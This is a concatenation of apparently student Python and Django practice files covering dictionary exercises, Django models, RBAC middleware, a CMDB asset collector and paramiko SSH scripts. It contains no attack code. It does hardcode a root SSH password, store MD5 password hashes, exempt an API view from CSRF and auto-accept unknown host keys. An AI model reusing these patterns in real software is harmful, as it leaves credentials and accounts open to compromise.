"x-art.com":["质量很高,真的很高","全部收费,屌丝请绕过"] }, "日韩":{ "tokyo-hot":["质量怎样不清楚,个人已经不喜欢日韩范了","verygood"] }, "大陆":{ "1024":["全部免费,真好,好人一生平安","服务器在国外,慢"] } } # 1,给此 ["很多免费的,世界最大的","质量一般"]列表第二个位置插入一个元素:'量很大'。 a = av_catalog.get("欧美").get("www.youporn.com") a.insert(1,'量很大') print(a) # 2,将此 ["质量很高,真的很高","全部收费,屌丝请绕过"]列表的 "全部收费,屌丝请绕过" 删除。 b = av_catalog.get("欧美").get('x-art.com') b.pop(1) print(b) # 4,将此["质量怎样不清楚,个人已经不喜欢日韩范了","verygood"]列表的 "verygood"全部变成大写。 c = av_catalog.get('日韩').get('tokyo-hot') c2 = c[1].upper() print(c2) #给 '大陆' 对应的字典添加一个键值对 '1048' :['一天就封了'] d = av_catalog.get('大陆') d1 = d["1048"] = "[一天就疯了]" print(d) #6,删除此"letmedothistoyou.com": ["多是自拍,高质量图片很多", "资源不多,更新慢"] 键值对。 f = av_catalog.get("欧美") f.pop("letmedothistoyou.com") print(f) #给此["全部免费,真好,好人一生平安","服务器在国外,慢"]列表的第一个元素,加上一句话:'可以爬下来' dd = av_catalog.get("大陆").get("1024") dd.insert(0,"可以爬下来") print(dd) ''' #有字符串"k:1|k1:2|k2:3|k3:4" 处理成字典 {'k':1,'k1':2....} str = "k:1|k1:2|k2:3|k3:4" a = str.split("|") print(a) dic = {} for i in a: b = i.split(":") ##把大列表变成小列表 print(b) dic[b[0]]=b[1] ##赋值k print(dic) # 有如下值li= [11,22,33,44,55,66,77,88,99,90], # 将所有大于 66 的值保存至字典的第一个key中,将小于 66 的值保存至第二个key的值中。 li= [11,22,33,44,55,66,77,88,99,90] dic = {"k1":[],"k2":[]} for i in li: if i > 66: dic.get("k1").append(i) else: dic.get("k2").append(i) print(dic) <file_sep>/day5/测试.py #拿到当前时间月初的时间戳 import time # time_str ='2018-5-1 0:0:0' # ret = time.strptime(time_str,'%Y-%m-%d %H:%M:%S') # print(ret) # print(time.mktime(ret)) ##计算任意两个时间段的经历了多少个年月日时分秒 # now_time = time.time()#时间戳 # ret = time.localtime(now_time) # print(ret) # print(time.strftime('%Y-%m-%d %H:%M:%S',ret)) # ago_time='2008-1-1:2:0:0' # ret1 = time.strptime() # print(ret1) -1+2-3 -1-2<file_sep>/day19/homework/s21/app01/models.py from django.db import models # Create your models here. #创建用户库 class User(models.Model): id = models.AutoField(primary_key=True) username=models.CharField(max_length=32,unique=True) password=models.CharField(max_length=32) services=models.ManyToManyField(to="Service",related_name="user") # 创建业务表 class Service(models.Model): id = models.AutoField(primary_key=True) name=models.CharField(max_length=32,unique=True) # 创建主机表 class Host(models.Model): id = models.AutoField(primary_key=True) hostname = models.CharField(max_length=32) pwd=models.CharField(max_length=32) service=models.ForeignKey(to="Service",on_delete=models.CASCADE) <file_sep>/student_guanli_system/core/manager.py import pickle import os import hashlib from conf import settings from core.teacher import Teacher from core.student import Student from core import mypickle class Foo: def __repr__(self): show_str='' for key in self.__dict__: show_str+='%s:%s'%(key,self.__dict__[key]) return show_str class School(Foo): def __init__(self,name,addr): self.name=name self.addr=addr class Classes(Foo): #班级类 def __init__(self,name,course): self.name=name self.course=course class Manager: Operate_lst = [('创建学校', 'create_school'), ('创建课程', 'create_courses'), ('创建班级', 'create_classes'), ('创建学员账号', 'create_student'), ('创建讲师账号', 'create_teacher'), ('查看学校', 'show_school'), ('查看讲师', 'show_teacher'), ('查看班级', 'show_class'), ('查看课程', 'show_course'), ('查看学生', 'show_student'), ('给课程关联讲师', 'combine_teacher_course'), ('给学员指定班级', 'add_student'), ('退出', 'quit') ] def __init__(self,name): self.name=name self.school_pickle=mypickle.MyPickle(settings.school_info) self.teacher_pickle = mypickle.MyPickle(settings.teacher_info) self.class_pickle = mypickle.MyPickle(settings.class_info) self.student_pickle = mypickle.MyPickle(settings.student_info) def create_school(self): sch_name=input('请输入学校名字:') sch_addr=input('请输入学校地址: ') sch_obj=School(sch_name+',',sch_addr) self.school_pickle.dump(sch_obj) print('创建学校成功') def show_school(self): for num,school_obj in enumerate(self.school_pickle.load(),1): print( '\033[1;32m查看学校:%s,%s\033[0m'% (num,school_obj)) def create_classes(self): class_name=input("请输入班级名称:") course=input('请输入课程:') clas_obj = Classes(class_name+',',course) #实例化班级 self.class_pickle.dump(clas_obj)#存储班级对象的信息到 classinfo 文件里 def show_class(self): for num,class_obj in enumerate(self.class_pickle.load(),1): print('\033[1;32m查看班级:%s,%s\033[0m' % (num, class_obj)) def __register(self,identity):#创建用户的方法 username=input('请输入要创建的%s角色的姓名' %identity) passwd=input('请输入密码') md5_obj=hashlib.md5(username.encode('utf-8')) md5_obj.update(passwd.encode('utf-8')) md5_passwd=md5_obj.hexdigest() new_user_info='%s,|%s,|%s\n' % (username,md5_passwd,identity) with open(settings.userinfo,mode='a',encoding='utf-8') as f: f.write(new_user_info) return username def create_courses(self): pass def create_teacher(self): username=self.__register('Teacher') #给老师选一个校区 self.show_school() school_num=int(input('请输入老师所在的学校序号:')) school_obj=self.school_pickle.get_item(school_num) #根据序号活动了一个学校名字 teacher_obj=Teacher(username+',') teacher_obj.school=school_obj # 将老师选择的校区和老师对象绑定在一起 self.teacher_pickle.dump(teacher_obj) # 将老师对象整体dump进入teacherinfo文件 print('创建老师成功') def show_teacher(self): for num, teacher_obj in enumerate(self.teacher_pickle.load(), 1): print('\033[1;32m查看信息为:%s,%s\033[0m' % (num, teacher_obj)) def create_student(self): username=self.__register('Student') self.show_class() #查看有哪些班级 cls_num=int(input('请选择要绑定的班级')) #把班级对象绑定给学生 cls_obj=self.class_pickle.get_item(cls_num) #根据cla_num去判断班级是否存在 # 创建一个学员对象,把学员的信息写在studentinfo stu_obj=Student(username+',') stu_obj.class_obj=cls_obj self.student_pickle.dump(stu_obj) def show_student(self): for num, student_obj in enumerate(self.student_pickle.load(), 1): print('\033[1;32m查看信息为:%s,%s\033[0m' % (num, student_obj)) <file_sep>/day15/python连接mysql/获取自增id.py import pymysql conn=pymysql.connect(host='localhost',user='root',password='123',database='user') cursor=conn.cursor() sql="insert into t1(name,pwd) values('aaa','123')" rows=cursor.execute(sql) print(cursor.lastrowid) #在插入语句后查看 conn.commit() cursor.close() conn.close()<file_sep>/deploy/script/压缩j解压缩.py import shutil # 压缩文件 # shutil.make_archive(base_name=r'C:\Users\Administrator\Desktop\deploy\script',format='zip',root_dir=r'C:\Users\Administrator\Desktop\deploy\script') # base_name 要压缩成那个文件 # root_dir 要压缩那个目录里面的文件 # 解压文件 # shutil.unpack_archive(r'C:\Users\Administrator\Desktop\deploy\script.zip', # extract_dir=r'C:\Users\Administrator\Desktop\deploy\uuu') # extract_dir 解压的文件放到那个目录,如果目录不存在就创建,如果不能解压报错,就是因为压缩文件已经损坏 <file_sep>/day21/CMS/fault_reporting/models.py from django.db import models from django.contrib.auth.models import AbstractUser # Create your models here. class UserInfo(AbstractUser): phone=models.CharField(max_length=11) avatar=models.FileField(upload_to="avatars/",default="avatars/default.png") class LOB(models.Model): """ 业务线 """ title = models.CharField(max_length=32, unique=True, verbose_name="业务线名称") def __str__(self): return self.title class Meta: verbose_name = "业务线" verbose_name_plural = verbose_name class Tag(models.Model): """ 故障标签 """ title = models.CharField(max_length=32, verbose_name="标签名称", unique=True) def __str__(self): return self.title class Meta: verbose_name = "标签" verbose_name_plural = verbose_name class UpDown(models.Model): """django_admin_log 支持或反对 同一个用户只能对一篇故障总结点支持或反对 支持或反对只能二选一:点了支持就不能点反对,反之亦然 """ user = models.ForeignKey(to="UserInfo", verbose_name="用户") fault_report = models.ForeignKey(to="FaultReport", verbose_name="故障总结") is_up = models.BooleanField(default=True, verbose_name="支持/反对") def __str__(self): return "{}-{}-{}".format(self.user.username, self.fault_report, "支持" if self.is_up else '反对') class Meta: # 联合唯一 # 限制一个用户只能给一篇故障总结点赞或反对一次 unique_together = (("fault_report", "user"),) verbose_name = "支持/反对" verbose_name_plural = verbose_name class Comment(models.Model): """ 评论 """ fault_report = models.ForeignKey(to="FaultReport", verbose_name="故障总结") user = models.ForeignKey(to="UserInfo") content = models.CharField(max_length=255) # 评论内容 create_time = models.DateTimeField(auto_now_add=True) # 自己关联自己的情况 parent_comment = models.ForeignKey(to="self", null=True, blank=True) def __str__(self): return self.content class Meta: verbose_name = "评论" verbose_name_plural = verbose_name class FaultReport(models.Model): """ 故障总结/故障报告 """ title = models.CharField(max_length=80, verbose_name="故障标题") desc = models.CharField(max_length=255, verbose_name="故障简介") create_time = models.DateTimeField(auto_now_add=True, verbose_name="发布时间") modify_time = models.DateTimeField(auto_now=True, verbose_name="最后修改时间") comment_count = models.IntegerField(default=0) up_count = models.IntegerField(default=0) down_count = models.IntegerField(default=0) lob = models.ForeignKey(to="LOB", null=True, verbose_name="所属业务线") user = models.ForeignKey(to="UserInfo", verbose_name="发布者") tags = models.ManyToManyField( to="Tag", through="Fault2Tag", # 指定第三张关系表 through_fields=("fault_report", "tag"), # 通过哪些字段建立多对多关系 ) def __str__(self): return self.title class Meta: verbose_name = "故障总结/故障报告" verbose_name_plural = verbose_name class Fault2Tag(models.Model): """ 故障报告和标签的多对多关系表 """ fault_report = models.ForeignKey(to="FaultReport", on_delete=models.CASCADE) tag = models.ForeignKey(to="Tag") def __str__(self): return "{}-{}".format(self.fault_report, self.tag) class Meta: unique_together = (("fault_report", "tag"),) verbose_name = "故障-标签" verbose_name_plural = verbose_name class FaultDetail(models.Model): """ 故障详情表 """ content = models.TextField() fault = models.OneToOneField(to="FaultReport") def __str__(self): return self.content[0:50] class Meta: verbose_name = "故障详情表" verbose_name_plural = verbose_name<file_sep>/day22/new/rbac/middleware/rbac.py ''' 自定义rbac中间件 ''' from django.utils.deprecation import MiddlewareMixin from django.shortcuts import redirect,HttpResponse,render import re from django.conf import settings class RBACMiddleware(MiddlewareMixin): def process_request(self,request): ''' 自定义权限校验的中间件 :param request: 请求对象 :return: ''' # 1 取到当前这次请求访问的url是什么 url=request.path_info # request.get_full_path() # 过滤白名单 for item in settings.PERMISSION_WHITE_URL: reg="^{}$".format(item) if re.match(reg,url): return None # 取到当前用户的权限列表 permission_list=request.session.get(settings.PERMISSION_SESSION_KEY,None) # 进行权限校验 if permission_list is None: # 用户没登录 return redirect("/login/") for i in permission_list: reg="^{}$".format(i['permissions__url']) if re.match(reg,url): break else: return HttpResponse("你没有此权限") <file_sep>/auto_server/api/views.py # Create your views here. from django.shortcuts import render, HttpResponse from django.views.decorators.csrf import csrf_exempt # 用djanjo自带的csrf import json from .plugins import PluginManger from datetime import date from repository import models from django.db.models import Q @csrf_exempt # 这个函数不走csrf_token def server(request): if request.method == "GET": current_date = date.today() # 获取今日未采集的主机列表 # 条件是更新时间为空,并且更新的时间小于现在的时间,还有主机的状态是在线状态才会拿到未采集的列表 ,双下划线date就是只取年月日 host_list = models.Server.objects.filter( Q(Q(latest_date=None) | Q(latest_date__date__lt=current_date)) & Q(server_status_id=2) ).values('hostname') host_list = list(host_list) print(host_list) return HttpResponse(json.dumps(host_list)) elif request.method == "POST": # 客户端提交的最新数据 server_dict = json.loads(request.body.decode('utf-8')) # 把二进制转换成utf-8, print(server_dict) # 检查server表中是否有当前资产信息(根据主机名去判断) if not server_dict['basic']['status']: # 如果状态码有误 return HttpResponse('获取不到信息') manager = PluginManger() response = manager.exec(server_dict) return HttpResponse(json.dumps(response)) # hostname = server_dict['basic']['data']['hostname'] # server_obj = models.Server.objects.filter(hostname=hostname).first() # if not server_obj: # # 创建服务器,创建硬盘内存网卡 # tmp = {} # tmp.update(server_dict['basic']['data']) # tmp.update(server_dict['board']['data']) # server_obj = models.Server.objects.create(**tmp) # # 网卡,内存,硬盘 # # # 硬盘 # disk_info_dict = server_dict['disk']['data'] # for item in disk_info_dict.values(): # item['server_obj'] = server_obj # models.Disk.objects.create(**item) # # 内存 # mem_info_dict = server_dict['memory']['data'] # for item in mem_info_dict.values(): # item['server_obj'] = server_obj # models.Memory.objects.create(**item) # # 网卡 # nic_info_dict = server_dict['nic']['data'] # for k, v in nic_info_dict.items(): # v['server_obj'] = server_obj # v['name'] = k # models.NIC.objects.create(**v) # # else: # 更新 # # 更新server表 # tmp = {} # tmp.update(server_dict['basic']['data']) # tmp.update(server_dict['board']['data']) # tmp.pop('hostname') # record_list = [] # for k, new_val in tmp.items(): # old_val = getattr(server_obj, k) # if old_val != new_val: # record = "[%s]的[%s]由[%s]变更为[%s]" % (server_obj.hostname, k, old_val, new_val) # record_list.append(record) # setattr(server_obj, k, new_val) # server_obj.save() # if record_list: # models.ServerRecord.objects.create(server_obj=server_obj, content=';'.join(record_list)) # # # 硬盘 # new_disk_info_dict = server_dict['disk']['data'] # 客户端发送过来新的数据 # # # """ # 新的数据格式是字典 # { # '0': {'slot': '0', 'pd_type': 'SAS', 'capacity': '279.396', 'model': 'SEAGATE ST300MM0006 LS08S0K2B5NV'}, # '1': {'slot': '1', 'pd_type': 'SAS', 'capacity': '279.396', 'model': 'SEAGATE ST300MM0006 LS08S0K2B5AH'}, # '2': {'slot': '2', 'pd_type': 'SATA', 'capacity': '476.939', 'model': 'S1SZNSAFA01085L # # } # """ # new_disk_info_list = server_obj.disk.all() # """ # 数据格式是这样的一个个对象 # [ # obj, # obj, # ] # """ # new_disk_slot_set = set(new_disk_info_dict.keys()) # 拿到前面的序号 {'3', '4', '5', '11', '9', '1', '2'} # old_disk_slot_set = {obj.slot for obj in new_disk_info_list} # 拿到前面的序号 # # add_slot_list = new_disk_slot_set.difference(old_disk_slot_set) # 取差集 # del_slot_list = old_disk_slot_set.difference(new_disk_slot_set) # update_slot_list = old_disk_slot_set.intersection(new_disk_slot_set) # # # 增加 # add_record_list = [] # for slot in add_slot_list: # slot是key # value = new_disk_info_dict[slot] # 根据key获得value # tmp = "添加硬盘" # add_record_list.append(tmp) # value['server_obj'] = server_obj # models.Disk.objects.create(**value) # # 删除 包含在del_slot_list里面的全部删除掉 # models.Disk.objects.filter(server_obj=server_obj, slot__in=del_slot_list).delete() # # # 更新 # # record_list = [] # 定义一个更改列表 # for slot in update_slot_list: # # print(slot) # slot是序号,0,2,3 # value = new_disk_info_dict[slot] # slot': '0', 'pd_type': 'SAS', 'capacity': '279.396', 'model': 'SEAGATE ST300MM0006 LS08S0K2B5NV' # obj = models.Disk.objects.filter(server_obj=server_obj, slot=slot).first() # # print('我是更新里面的obj',obj) # for k, new_val in value.items(): # old_val = getattr(obj, k) # # print(old_val) # # if old_val != new_val: # # record = "[%s]的[%s]里面的[%s]由[%s]变更为[%s]" % (self.server_obj.hostname, slot, k, old_val, new_val) # # print(record) # # record_list.append(record) # # print(record_list) # setattr(obj, k, new_val) # obj.save() # return HttpResponse('OK') <file_sep>/deploy/script/用户名密码.py import paramiko # 创建SSH对象 ssh = paramiko.SSHClient() # 允许连接不在know_hosts文件中的主机 ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) # 连接服务器 ssh.connect(hostname='192.168.7.32', port=22, username='root', password='123') # 执行命令 stdin, stdout, stderr = ssh.exec_command('ifconfig') # 获取命令结果 result = stdout.read() # 关闭连接 ssh.close() print(result) <file_sep>/day27/s21crm/crm/forms/depart.py from django import forms from crm import models class DepartModelForm(forms.ModelForm): class Meta: model = models.Department # 这里前面的model一定不要写models fields = '__all__' error_messages = { 'title': {'required': '部门不能为空'} } widgets = { 'title': forms.TextInput(attrs={'class': 'form-control'}) } <file_sep>/day24/auto - 12 - 权限粒度控制到按钮/app01/urls.py from django.conf.urls import url,include from django.contrib import admin from app01 import views urlpatterns = [ url(r'^login/$', views.login), url(r'^user/$', views.user_list), url(r'^user/add/$', views.user_add), url(r'^user/edit/(\d+)/$', views.user_edit), url(r'^user/del/(\d+)$', views.user_del), url(r'^center/$', views.center), ] <file_sep>/auto_client/conf/settings.py import os PLUGIN_ITEMS = { "nic": "src.plugins.nic.Nic", "disk": "src.plugins.disk.Disk", "memory": "src.plugins.memory.Memory", "basic": "src.plugins.basic.Basic", "board": "src.plugins.board.Board", } BASEDIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) # api接口地址 API = "http://127.0.0.1:8000/api/server.html" TEST = True MODE = "AGENT" # 有三种模式 agent/ssh/salt HOSTNAME = '1.1.1.1' PORT = '22' PASSWORD = '<PASSWORD>' USERNAME = 'root' <file_sep>/cmdb/auto_client - 7 - 资产信息入库/src/engine/ssh.py #!/usr/bin/python # -*- coding:utf-8 -*- from config import settings from .base import SaltAndSSHHandler class SSHHandler(SaltAndSSHHandler): def cmd(self, command, hostname=None): """ 调用paramiko远程连接主机并执行命令,依赖rsa :param hostname:主机名 :param command: 要执行的命令 :return: """ import paramiko private_key = paramiko.RSAKey.from_private_key_file(settings.SSH_PRIVATE_KEY) ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) ssh.connect(hostname=hostname, port=settings.SSH_PORT, username=settings.SSH_USER, pkey=private_key) stdin, stdout, stderr = ssh.exec_command(command) result = stdout.read() ssh.close() return result <file_sep>/day7/hashlib模块.py #hashlib模块 摘要算法 ---> 单向不可逆 用于加密 # 包含了多种算法 # 将一个字符串进行摘要运算 拿到不变的 固定长度的值 import hashlib md5obj=hashlib.md5() # 实例化一个md5摘要算法的对象 md5obj.update('alex3714'.encode('utf-8')) # 使用md5算法的对象来操作字符串 ret = md5obj.hexdigest() #获取算法的结果 hex+digest 16进制+消化 print(ret,type(ret)) #加盐 md5obj=hashlib.md5('hello'.encode('utf-8')) # 实例化一个md5摘要算法的对象,加盐 md5obj.update('alex3714'.encode('utf-8'))# 使用md5算法的对象来操作字符串 ret=md5obj.hexdigest() print(ret) #动态加盐 username='hu' md5obj=hashlib.md5(username.encode('utf-8')) md5obj.update('alex3714'.encode('utf-8'))# 使用md5算法的对象来操作字符串里面必须是bytes类型 ret=md5obj.hexdigest() print(ret) class Longin: def __init__(self,name,passwd): self.name=name self.passwd=passwd def hamd5(self): name = input('<<<:') pwd = input('<<<:') md5obj = hashlib.md5(self.name.encode('utf-8')) md5obj.update('self.passwd'.encode('utf-8')) ret=md5obj.hexdigest() print(ret) # @staticmethod # def login(): alex=Longin('alex','alex3714') alex.hamd5() <file_sep>/day26/谷歌无头浏览器.py from selenium import webdriver from selenium.webdriver.chrome.options import Options import time # 创建一个参数对象,用来控制谷歌浏览器无界面打开 chrome_options = Options() chrome_options.add_argument('--headless') chrome_options.add_argument('--disable-gpu') # 驱动路径 path=r'D:\python21\python\day26\selenium自动化操作\chromedriver_win32\chromedriver.exe' #创建浏览器对象 browser=webdriver.Chrome(executable_path=path,chrome_options=chrome_options) # 上网 url='http://www.baidu.com/' browser.get(url=url) time.sleep(2) browser.save_screenshot('baidu.png') #后缀推荐用png,jpg会提示信息 browser.quit() <file_sep>/day17/lianxi/orm查询数据.py import os if __name__ == '__main__': os.environ.setdefault("DJANGO_SETTINGS_MODULE", "lianxi.settings") import django django.setup() from app01 import models # 查询一个 # ret = models.Person.objects.get(age=18) # print(ret) # 查询所有 # ret1 = models.Person.objects.filter(age=18) # print(ret1) # # ret2 = models.Person.objects.filter(age=18).values("age", "phone","name") # print(ret2) # # ret3 = models.Person.objects.filter(age=18).values_list("age", "phone",'name') # print(ret3) # 排序 # ret = models.Person.objects.all().order_by("age") # print(ret) # 查询大于18的 # ret1 = models.Person.objects.filter(age__gt=18) # print(ret1) # 查询id在【1,2】的人 # ret = models.Person.objects.filter(id__in=[1,2]) # print(ret) # 查询id不在【1,2】 # ret = models.Person.objects.exclude(id__in=[1,2]) # print(ret) # 查询名字中包含jj的那个人(不区分大小写) # ret = models.Person.objects.filter(name__contains="JJ") # print(ret) # 查询id在1-3区间内的数据 # ret = models.Person.objects.filter(id__range=[1, 3]) # print(ret) # 查询以JJ结尾的人 # ret = models.Person.objects.filter(name__endswith='JJ') # print(ret) # 查询生日在2018年的,(sqlit查不到) # ret = models.Person.objects.filter(birthday__year=2018) # print(ret) # 查询第一本书关联的出版社名字 #基于对象的查询 # book_obj=models.Book.objects.first() # ret=book_obj.publisher.name # book_name=book_obj.title # print(book_name,ret) # 基于querset 的双下划线查询,双下划线表示跨表,查询出版社名字,并去重 # ret = models.Book.objects.all().values_list("publisher__name").distinct() # print(ret) # 反向查询 # 由出版社反向查找书籍 publisher_obj=models.Publisher.objects.get(id=2) books=publisher_obj.book_set.all() title=books.values_list("title","id") print(title) # 2. 基于queryset的双下划线 # 江出版社出版的所有书籍的书名 ret = models.Publisher.objects.filter(id=2).values_list("book__title","book__id") print(ret)<file_sep>/day24/auto - 12 - 权限粒度控制到按钮/相关脚本/3.构建菜单结构.py permission_list = [ { 'permissions__title': '用户列表', 'permissions__url': '/app01/user/', 'permissions__name': 'user_list', 'permissions__menu_id': 1, 'permissions__menu__title': '用户管理', 'permissions__menu__icon': 'fa-clipboard', 'permissions__parent_id': None, 'permissions__parent__name': None }, { 'permissions__title': '订单列表', 'permissions__url': '/app01/order/', 'permissions__name': 'order', 'permissions__menu_id': 2, 'permissions__menu__title': '商品管理', 'permissions__menu__icon': 'fa-clipboard', 'permissions__parent_id': None, 'permissions__parent__name': None }, ] """ menu_dict = { 1:{ 'title':'用户管理', 'icon':'fa-clipboard', 'children':[ {'title':'用户列表','url':'/app01/user/'}, ] }, 2:{ 'title':'商品管理', 'icon':'fa-clipboard', 'children':[ {'title':'订单列表','url':'/app01/order/'}, ] } } """ menu_dict = {} for item in permission_list: menu_id = item['permissions__menu_id'] if menu_id in menu_dict: menu_dict[menu_id]['children'].append({'title':item['permissions__title'],'url':item['permissions__url'],'name':item['permissions__name'] }) else: menu_dict[menu_id] = { 'title': item['permissions__menu__title'], 'icon': item['permissions__menu__icon'], 'children':[ {'title':item['permissions__title'],'url':item['permissions__url'],'name':item['permissions__name'] } ] } print(menu_dict) <file_sep>/day27/s21crm/crm/views/login.py from django.shortcuts import render, redirect from django.urls import reverse from crm import models from crm.pwd.md5 import md5 from rbac.service.permission import init_permission from functools import wraps # session 登录装饰器 def login_check(func): @wraps(func) def inner(request, *args, **kwargs): next_url = request.path_info if request.session.get('user'): return func(request, *args, **kwargs) else: return redirect("/login/?next_url={}".format(next_url)) return inner # 注销页面 @login_check def logout(request): # 删除所有当前请求相关的session request.session.delete() return redirect("/login/") def login(request): """ 用户登录 :param request: :return: """ if request.method == 'GET': return render(request, 'login.html') user = request.POST.get('username') pwd = md5(request.POST.get('password')) user_object = models.UserInfo.objects.filter(username=user, password=pwd).first() if not user_object: return render(request, 'login.html', {'error': '用户名或密码错误'}) # 用户登录的信息存储到session里面 request.session['user_info'] = {'id': user_object.id, 'name': user_object.username} init_permission(user_object, request) return redirect(reverse('index')) def index(request): return render(request, 'index.html') <file_sep>/day9/线程/锁.py from threading import Thread,Lock import time def work(): global n lock.acquire() temp=n time.sleep(0.1) n=temp-1 lock.release() if __name__ == '__main__': lock = Lock() n=100 l=[] for i in range(10): p=Thread(target=work) l.append(p) p.start() for i in l: i.join() print(n) # 当你的程序中出现了取值计算再赋值的操作 数据不安全 —— 加锁 <file_sep>/auto_server/api/plugins/disk.py from repository import models class Disk(object): def __init__(self, server_obj, info): ''' :param server_obj: 主机名 :param info: 硬盘信息 ''' self.server_obj = server_obj self.disk_dict = info def process(self): new_disk_info_dict = self.disk_dict['data'] # 客户端发送过来新的数据 """ 新的数据格式是字典 { '0': {'slot': '0', 'pd_type': 'SAS', 'capacity': '279.396', 'model': 'SEAGATE ST300MM0006 LS08S0K2B5NV'}, '1': {'slot': '1', 'pd_type': 'SAS', 'capacity': '279.396', 'model': 'SEAGATE ST300MM0006 LS08S0K2B5AH'}, '2': {'slot': '2', 'pd_type': 'SATA', 'capacity': '476.939', 'model': 'S1SZNSAFA01085L } """ new_disk_info_list = self.server_obj.disk.all() """ 数据格式是这样的一个个对象 [ obj, obj, ] """ new_disk_slot_set = set(new_disk_info_dict.keys()) # 拿到前面的序号 old_disk_slot_set = {obj.slot for obj in new_disk_info_list} # 拿到前面的序号 add_slot_list = new_disk_slot_set.difference(old_disk_slot_set) # 取差集 del_slot_list = old_disk_slot_set.difference(new_disk_slot_set) update_slot_list = old_disk_slot_set.intersection(new_disk_slot_set) print(update_slot_list) # 增加 add_record_list = [] for slot in add_slot_list: # slot是key value = new_disk_info_dict[slot] # 根据key获得value tmp = "添加硬盘" add_record_list.append(tmp) value['server_obj'] = self.server_obj models.Disk.objects.create(**value) # 删除 包含在del_slot_list里面的全部删除掉 models.Disk.objects.filter(server_obj=self.server_obj, slot__in=del_slot_list).delete() # 更新 # record_list = [] # 定义一个更改列表 for slot in update_slot_list: # print(slot) value = new_disk_info_dict[slot] # slot': '0', 'pd_type': 'SAS', 'capacity': '279.396', 'model': 'SEAGATE ST300MM0006 LS08S0K2B5NV' obj = models.Disk.objects.filter(server_obj=self.server_obj, slot=slot).first() # print('我是更新里面的obj',obj) for k, new_val in value.items(): old_val = getattr(obj, k) # print(old_val) if old_val != new_val: # record = "[%s]的[%s]里面的[%s]由[%s]变更为[%s]" % (self.server_obj.hostname, slot, k, old_val, new_val) # print(record) # record_list.append(record) # print(record_list) setattr(obj, k, new_val) obj.save() # if record_list: # models.ServerRecord.objects.create(server_obj=self.server_obj, content=';'.join(record_list)) <file_sep>/day20/CMS/fault_reporting/views.py from django.shortcuts import render, redirect, HttpResponse from django import views from django.contrib import auth import random from fault_reporting import forms from fault_reporting import models from django.http import JsonResponse # Create your views here. class LoginView(views.View): ''' 如果用户发送的是get就返回登录页面 如果是post请求,先获取用户想访问那个页面用next,然后让他输入用户名密码还有验证码,先验证 用户名和密码,然后再判断验证码是否正确,如果都是正确的,就跳转到用户访问的那个页面 ''' def get(self, request): return render(request, "login.html") def post(self, request): next_url = request.GET.get("next", "/index/") username = request.POST.get("username") pwd = request.POST.get("password") v_code = request.POST.get("vcode", "").upper() # 如果用户不写验证码就是空 if v_code == request.session.get("v_code"): user_obj = auth.authenticate(username=username, password=pwd) if user_obj: auth.login(request, user_obj) # auth认证登录 return redirect(next_url) else: return render(request, "login.html", {"error_msg": "用户名或密码错误"}) else: return render(request, "login.html", {"error_msg": "验证码错误"}) def logout(request): ''' 注销用auth模块,然后跳转到登录页面 :param request: :return: ''' auth.logout(request) return redirect("/login/") # 首页 def index(request, *args): ''' index可以传参数类似 --/lob/视频/--格式的参数 args[1]代表第二个参数,0代表第一个 首先分别取到业务,标签,时间的个数,然后点击不同的业务,标签,或时间跳转属于自己的内容界面 时间这里加上了try except捕获异常,因为怕用户输入的时间日期,不符合格式,如果没有这个日期则返回空 统计数量用的是orm的聚合查询需要先导入count :param request: :param args: :return: ''' # 取到所有的故障总结 report_list = models.FaultReport.objects.all() # 如果有参数,并且参数长度是2 if args and len(args) == 2: # 进入细分查询 if args[0] == "lob": # 按业务线查询, report_list = report_list.filter(lob__title=args[1]) #args[1]指的是视频等业务 elif args[0] == "tag": # 是按照标签查询 report_list = report_list.filter(tags__title=args[1]) else: # 按照日期(年月)来查询 try: year, month = args[1].split("-") #以-切割,取出年和月 print(year) report_list = report_list.filter(create_time__year=year, create_time__month=month) except Exception: report_list = [] # 导入 from django.db.models import Count # 聚合查询业务线 ,title是LOB表里的title lob_list = models.LOB.objects.all().annotate(num=Count("faultreport")).values("title", "num") # 正常查询 # lob_list = models.LOB.objects.all() # 取到所有标签 # tag_list=models.Tag.objects.all() # 分组获取标签 tag_list = models.Tag.objects.all().annotate(num=Count("faultreport")).values("title", "num") # 拿到一个日期归档数据 archive_list = models.FaultReport.objects.all().extra( select={"ym": "strftime('%%Y-%%m', create_time)"} ).values("ym").annotate(num=Count("id")).values("ym", "num") return render(request, "index.html", locals()) # 验证码路径 def vcode(request): from PIL import Image, ImageDraw, ImageFont # 导入绘图模块 # 定义一个生成随机颜色代码的函数 def random_color(): return random.randint(0, 255), random.randint(0, 255), random.randint(0, 255) # 创建一个随机背景颜色的图片对象 image_obj = Image.new( "RGB", (250, 35), # 背景图片的长和宽 (255, 255, 140) ) # 在该图片对象上生成一个画笔对象 draw_obj = ImageDraw.Draw(image_obj) # 加载一个字体对象 font_obj = ImageFont.truetype('static/font/kumo.ttf', 28) # 字体大小 tmp = [] for i in range(5): l = chr(random.randint(97, 122)) # 生成随机的小写字母 u = chr(random.randint(65, 90)) # 生成随机的大写字母 n = str(random.randint(0, 9)) # 生成一个随机的数字 # 从上面三个随机选一个 r = random.choice([l, u, n]) # 将选中过的那个字符写到图片上 draw_obj.text((30 * i + 30, 0), r, fill=random_color(), font=font_obj) # text指定的是从那开始写位置,fill是字体颜色 tmp.append(r) v_code = "".join(tmp).upper() # 将生成的验证码保存 request.session["v_code"] = v_code # 直接在内存中保存图片替代io操作 from io import BytesIO f1 = BytesIO() image_obj.save(f1, format="PNG") # 将背景图片保存到f1里面 img_data = f1.getvalue() # 去f1取图片 return HttpResponse(img_data, content_type="image/png") # 注册 class RegisterView(views.View): ''' 如果是get请求,就返回注册页面,用的form写的注册页面,先导入刚才写的forms模块,然后调用RggisterForm 如果是post请求(就是提交请求),form_obj获取到用户填的所有内容,然后去校验数据格式是否正确,如果没问题,就去 数据库里面创建数据,创建之前,要先删除re_password这个字段,因为数据库里没有这个字段 然后接受头像文件,需要用request.FILES,去获取 最后去数据库保存,需要把你的普通数据和头像数据分开来存储。 注册成功之后,就跳转到登录界面,否则就报报错信息返回到页面上面 ''' def get(self, request): form_obj = forms.RegisterForm() return render(request, "register.html", locals()) def post(self, request): res = {"code": 0} form_obj = forms.RegisterForm(request.POST) if form_obj.is_valid(): # 数据没问题,去数据库创建记录 form_obj.cleaned_data.pop("re_password") # 头像数据,文件对象 avatar_obj = request.FILES.get("avatar") # 头像文件保存到数据库,如果你的models里面写的这个字段FileField,就会自动写在服务器上面 